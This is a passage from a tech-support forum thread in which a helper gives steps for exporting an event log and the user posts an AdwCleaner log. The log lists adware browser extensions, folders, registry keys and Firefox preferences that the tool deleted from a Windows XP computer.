2. Type 20 in the 1 to 20 box
3. Then click the Run button.

Notepad will open with the output log.

Please post the Output log in your next reply, then repeat but select Application.

Ron

#15
goodseed

    Member

  • Topic Starter
  • Member
  • PipPip
  • 49 posts
# AdwCleaner v2.106 - Logfile created 01/19/2013 at 09:31:43
# Updated 17/01/2013 by Xplode
# Operating system : Microsoft Windows XP Service Pack 3 (32 bits)
# User : Owner - YOUR-46E94OWX6A
# Boot Mode : Normal
# Running from : C:\Documents and Settings\Owner\My Documents\Downloads\adwcleaner.exe
# Option [Delete]


***** [Services] *****


***** [Files / Folders] *****

Deleted on reboot : C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho
Folder Deleted : C:\Documents and Settings\Administrator.YOUR-46E94OWX6A\Application Data\Mozilla\Firefox\Profiles\0yoa5veo.default\extensions\[email protected]
Folder Deleted : C:\Documents and Settings\All Users\Application Data\InstallMate
Folder Deleted : C:\Documents and Settings\All Users\Application Data\Premium
Folder Deleted : C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\[email protected]

***** [Registry] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho
Key Deleted : HKLM\Software\ImInstaller
Key Deleted : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0FF2AEFF45EEA0A48A4B33C1973B6094
Key Deleted : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\305B09CE8C53A214DB58887F62F25536

***** [Internet Browsers] *****

-\\ Internet Explorer v8.0.6001.18702

[OK] Registry is clean.

-\\ Mozilla Firefox v18.0.1 (en-US)

File : C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\prefs.js

C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\user.js ... Deleted !

Deleted : user_pref("browser.newtabpage.blocked", "{\"h0aMB8AuNw74TUt+OmaFiQ==\":1,\"7Rc8ejXzptvtSL7bDmf7dw==\[...]

File : C:\Documents and Settings\Administrator.YOUR-46E94OWX6A\Application Data\Mozilla\Firefox\Profiles\0yoa5veo.default\prefs.js

Deleted : user_pref("extensions.crossriderapp435.adsOldValue", -1);

-\\ Google Chrome v24.0.1312.52

File : C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences

[OK] File is clean.

*************************

AdwCleaner[S1].txt - [2364 octets] - [19/01/2013 09:31:43]

########## EOF - C:\AdwCleaner[S1].txt - [2424 octets] ##########